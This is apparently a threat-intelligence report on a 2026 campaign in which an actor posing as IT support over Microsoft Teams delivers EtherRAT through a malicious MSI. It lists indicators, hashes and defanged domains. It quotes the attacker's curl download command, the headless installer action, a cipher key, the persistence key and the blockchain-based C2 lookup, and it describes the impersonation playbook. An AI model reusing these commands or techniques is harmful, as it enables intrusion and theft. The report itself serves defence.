2026-06-28 (SUNDAY): FAKE IT-SUPPORT SCAM ABUSES TEAMS CALL TO DELIVER ETHERRAT VIA MALICIOUS MSI AND BLOCKCHAIN ANCHORED C2 AUTHOR: - Brian Janower REFERENCES: - https://www.linkedin.com/posts/phishing-etherrat-ugcPost-7478229973678460928-PATm/ - https://x.com/Unit42_Intel/status/2072464336040189959 NOTES: - We observed a social engineering campaign that combines email phishing with a fake IT support abusing Microsoft Teams call to deliver EtherRAT. - The attack lures the victim with a fake "Employee Survey" email and PDF, then pivots to a Microsoft Teams call from an actor impersonating a "System Administrator." - We’ve seen in the logs of the User’s session the Title “System Administrator (External unfamiliar) | Microsoft Teams”, the External unfamiliar tag, indicates a contact from outside the organization with no trusted relationship. - Microsoft Teams audit logs confirm the actor initiated a cross tenant OneOnOne chat from the attacker controlled account helpdesk@Progressive936.onmicrosoft[.c]om (display name "System Administrator") to the victim. - The actor abuses Teams remote control (give/request control) to control the victim's machine, then guides the victim to install different remote RMM tools to establish persistence - HopToDesk and AnyDesk. - The actor uses cmd.exe > curl.exe to download a malicious MSI (v7.msi) from camorreado[.]click and execute it. - The MSI is a multi stage loader that downloads a legitimate Node.js runtime, decrypts an embedded payload through a multi-step cipher chain, and runs EtherRAT. - EtherRAT is a blockchain anchored C2 bot that resolves its command and control URL from an Ethereum smart contract, with a hardcoded fallback C2. - We found an open directory hosting EtherRAT versions v1 through v9, last updated June 26, on camorreado[.]click. DETAILS: INITIAL ACCESS AND SOCIAL ENGINEERING (VICTIM SESSION): - The intrusion began as a malicious email baiting the victim to open a PDF. -- "Employee Survey results" arrived as an HTML message. -- "EE Survey - How to log on.pdf" was opened in Adobe Acrobat Reader. - The victim then received a Microsoft Teams call from an actor impersonating a "System Administrator." -- The title seen in the user session contained the "External unfamiliar" string. -- This tag appears when chatting or meeting with someone outside the organization who lacks a recognized, trusted relationship with the company network. -- The attacker account was helpdesk@Progressive936.onmicrosoft.com with display name "System Administrator" (attacker tenant 310e9ead-4f6f-491e-aafe-feb08c8d17a4). -- ParticipantInfo confirms HasForeignTenantUsers: true, corroborating the cross-tenant "External (unfamiliar)" nature of the contact. - The user session showed the artifact "CtrlVirtualCursorWin_000001E8A159B970", evidence that the threat actor obtained remote control of the victim's machine over Microsoft Teams. -- This artifact is generated by Teams' screen-control feature: when a meeting participant gives or requests control of another user's screen, Teams intercepts the controller's mouse movements and injects them into the controlled computer via a virtual cursor. -- Its presence indicates the actor was actively driving the victim's machine remotely during the session, rather than the victim acting alone. - Under remote control, the actor steered the victim through remote desktop tooling. -- The victim browsed HopToDesk (Free Remote Desktop Software) in Microsoft Edge and downloaded the RMM tool. -- The victim browsed and downloaded AnyDesk in Microsoft Edge. - The actor used a Command Prompt to fetch the malicious installer. -- cmd /c curl -Lo C:\Users\{REDACTED}1\AppData\Local\Temp\v7.msi hxxps[:]//camorreado[.]click/v7.msi - While in control of the machine, the actor accessed the company's ServiceNow portal and created a new support ticket. -- The ticket appears to request access to certain applications and other information. -- Related activity included the internal IT Service Portal ("How to use the {REDACTED} IT Service Portal"), Employee Center pages (Homepage, IT Security, Ask a question), and the ticket "My Request - INC0491{REDACTED}". MSI LOADER AND EXECUTION CHAIN: - The sample v7.msi is a Windows Installer (MSI) file written in JavaScript targeting Windows. - The MSI drops three files into the local application data directory: -- A batch script (R2YxSP2m.cmd) -- An obfuscated JavaScript loader (z0SYYdWk9g.dat) -- An encrypted binary blob (eXYlcnebRLrWyBc.ini) - A CustomAction executes during installation: -- conhost --headless cmd /c "R2YxSP2m.cmd" - The batch script stages a legitimate Node.js runtime: -- Downloads Node.js v18.20.5 from hxxps[:]//nodejs[.]org/dist/v18.20.5/node-v18.20.5-win-x64.zip -- Extracts it and renames the directory to 1DIZ0D -- Launches conhost --headless with node.exe executing z0SYYdWk9g.dat - The JavaScript loader decrypts embedded hex-encoded data: -- Uses a subtraction cipher with a 24-byte key: 94ea2ff910a28771f74c2759132ce77d0eb231e3aa1900e1 -- Produces a second-stage loader. - The second-stage loader decrypts eXYlcnebRLrWyBc.ini using a multi-step cipher chain. PAYLOAD AND C2 (#ETHERRAT): - The final payload is a blockchain anchored C2 bot. - It resolves its command and control URL from an Ethereum smart contract: -- 0x6e044e19000487c4a6e6af15b4132a5561b5ee1f - It uses a hardcoded fallback C2: -- hxxps[:]//necropatia[.]com - Persistence is established via the registry Run key: -- Software\Microsoft\Windows\CurrentVersion\Run\OneDriveSetup ACTOR INFRASTRUCTURE: - We found an open directory containing EtherRAT versions v1 through v9. -- Hosted on camorreado[.]click. -- Last updated June 26, 2026. INDICATORS: ATTACKER TENANT: - helpdesk@Progressive936.onmicrosoft[.]com (attacker account, display name "System Administrator") - Progressive936.onmicrosoft[.]com (attacker sender domain) - 310e9ead-4f6f-491e-aafe-feb08c8d17a4 (attacker tenant ID) DOMAINS: - camorreado[.]click (malware distribution / open directory hosting EtherRAT v1-v9) - necropatia[.]com (fallback C2 domain) SHA256 HASHES: - fc2907fa866f86e0821f75060a331ce69ee10ff3aa374587993b17ba5406fa33 (v7.msi) - c2eeb74892408496f5a307a5b1fdc92d94fd014ab4252868f04046bf84718ab6 (stage2_payload1.cmd) - 94cb54d53927e4ba469099760db531be563a84d716df69e864062d90f0f2448d (stage2_payload2.js) - 0cb2f7651d50e1ed1a691e82f0297d49444bdded2461e136cffb156d4f234e52 (stage2_payload3.dat) - c16784e2c7b3e3b798addd718850da18f8eb532ab8f352c769a4470d7124805d (stage4_payload1.js) - d46b4e8d188fe1773c44d38d730dcb6287639568240c765d9ad4ad79cd239e82 (stage3_payload1.js) URLS: - hxxps[:]//camorreado[.]click/v7.msi (malicious MSI) - hxxps[:]//necropatia[.]com (fallback C2) ETHEREUM SMART CONTRACT: - 0x6e044e19000487c4a6e6af15b4132a5561b5ee1f (Smart contract queried to resolve the C2 URL) - 0x788a5336c0ef70be87619a3c13a43050c426f7ec (Hosting smart contract queried to resolve the C2 URL) C2 URLS (RESOLVED FROM ETHEREUM SMART CONTRACT TRANSACTIONS): - hxxps[:]//seconds.australiaeast.cloudapp.azure[.]com - hxxps[:]//resurce.swedencentral.cloudapp.azure[.]com - hxxps[:]//cover.wedencentral.cloudapp.azure[.]com - hxxps[:]//dns1.southafricanorth.cloudapp.azure[.]com